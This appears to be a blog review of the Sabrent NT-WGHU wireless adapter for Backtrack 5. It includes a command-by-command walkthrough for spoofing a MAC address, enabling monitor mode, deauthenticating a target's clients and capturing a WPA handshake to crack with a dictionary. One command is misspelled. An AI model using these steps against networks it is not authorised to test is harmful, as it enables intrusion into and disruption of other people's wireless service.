Disclaimer: All information on this site is for testing and educational purposes only; for use by network security administrators or testing the security of your own wireless connection.
Backtrack 5 is out and so we are beginning to review Backtrack 5 wireless USB compatible adapters. Although I am fairly sure, that a adapter that worked with Backtrack 4 will still work with Backtrack 5.
That is what this review is about, an adapter that I have that worked well with Backtrack 4 and now I am using with Backtrack 5. The USB wireless adapter is the Sabrent NT-WGHU which I have used many times and it is one of my favorite wireless USB adapters.
The Sabrent NT-WGHU uses the Backtrack friendly 8187 chipset. I also use it with Windows 7 and Windows XP although I mainly use it with Linux/Backtrack. It also will boost a wireless signal much farther than most adapters which is very useful. It does this with a 7 inch antenna that may stand out in a public place. The only real down side to the Sabrent NT-WGHU is the lack of N wireless support.
Step by Step WPA, WPA2 wireless capture with Sabrent NT-WGHU
This was done on my own network as an example.
The first thing I do is change the mac address.(This step can be skipped)
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
Now the wireless connection needs to be restarted.
Airmon-ng start wlan0
Hint: If there is an error here with the Sabrent NT-WGHU then try
Airmon-ng start mon0
Sometimes a adapter will be on mon0 instead of wlan0 also if the Sabrent NT-WGHU gives a strange error here then use these commands
rmmod rtl8187
modprobe rtl8187
And then doing a “airmon-ng start” this will reload the Sabrent NT-WGHU drivers.
Now we want to see what wireless connections are out there.
airodump-ng mon0
Once you see a wireless connection you want to test press CTRL+C to stop the screen. Then type:
airodumping-ng –c (channel) –w (file name) –bssid (bssid) mon0
(The channel is the channel the target wireless device uses, the file name can be what ever name you want to give the file that stores the WPA handshake (This is stored in /root by default). The bssid can be copied and then pasted.)
Open another terminal windows while the other runs. (you will need two terminal windows open)
aireplay-ng -0 5 -a (bssid) -c (clients mac) mon0
This will send a deauth command at the target wireless device. The “-0” is the deauth command, the 5 is the number of time to send the deauth command and can be changed.
Once you get a handshake like in the picture above you are ready to use aircrack and a dictionary to crack it. Finding a good dictionary is a must; although there is some dictionaries in Backtrack under the Pentest directory, I found them to be lacking a bit. Mainly because of the size a good dictionary needs to be. For more on cracking WPA or WPA2 click here………..
Disclaimer: All information on this site is for testing and educational purposes only; for use by network security administrators or testing the security of your own wireless connection.
I love this adapter! it’s very powerful